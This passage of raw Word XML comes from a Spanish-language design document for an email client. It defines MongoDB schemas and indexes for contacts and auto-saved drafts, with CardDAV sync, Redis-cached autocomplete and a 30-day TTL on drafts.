        <w:t xml:space="preserve"> IContact {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia al usuario propietario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Nombre completo del contacto */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  fullName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Nombre para ordenar (apellido, nombre) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  sortName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Email principal */</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Emails adicionales */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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'work', 'home', 'other'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    address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Teléfonos */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  phones</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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'mobile', 'work', 'home', 'fax'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    number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Organización */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  organization</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Cargo / título */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  jobTitle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Notas */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  notes</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Dirección postal */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    street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city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postalCode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country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URL del sitio web */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  website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Fecha de cumpleaños */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  birthday</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** URL del avatar o foto */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  photoUrl</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Si es un contacto frecuente (usado para autocomplete) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  isFrequent</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Contador de usos (emails enviados a este contacto) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  usageCount</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Origen del contacto: local, imported, carddav */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'local'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imported'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'carddav'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Si sincronizado con CardDAV: URL del recurso y ETag */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  carddavSync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    resourceUrl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etag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lastSyncedAt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Fecha de creación */</w:t>
      </w:r>
      <w:r>
        <w:br/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de última modificación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  updatedAt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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">usageCount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se incrementa cada vez que el usuario envía un email al contacto, y se utiliza para ordenar las sugerencias de autocomplete en el compositor. Los contactos con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isFrequent: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se cachean en Redis para respuestas de autocomplete sub-50ms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, sortName: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar contactos ordenados alfabéticamente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, email: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— unique sparse, para evitar duplicados por email.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, isFrequent: -1, usageCount: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para autocomplete de contactos frecuentes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, "carddavSync.etag": 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para sincronización incremental CardDAV.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="85" w:name="colección-drafts-auto-save-local"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.7 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">drafts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Auto-Save Local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los borradores se almacenan exclusivamente en MongoDB sin sincronización con el servidor IMAP, facilitando un auto-guardado rápido y la gestión de múltiples borradores simultáneos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDraft {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia a la cuenta desde la que se enviará */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia al usuario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Destinatarios principales */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  to</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address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Destinatarios en copia */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  cc</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address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Destinatarios en copia oculta */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bcc</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address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Asunto */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  subject</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Cuerpo del mensaje en HTML */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bodyHtml</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Cuerpo del mensaje en texto plano */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  bodyText</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IDs de adjuntos temporales */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  attachments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    filename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contentType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storageKey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Headers In-Reply-To y References (si es respuesta) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  replyTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    emailId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    messageId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references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Si usar firma */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  includeSignature</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Estado del borrador */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'editing'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sending'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sent'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'failed'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de última modificación (para auto-save) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastModifiedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha de creación */</w:t>
      </w:r>
      <w:r>
        <w:br/>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lastModifiedAt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tiene un índice TTL de 30 días: los drafts no modificados durante ese período se eliminan automáticamente por MongoDB, evitando acumulación de borradores abandonados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Índices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, lastModifiedAt: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— para listar drafts recientes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{lastModifiedAt: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
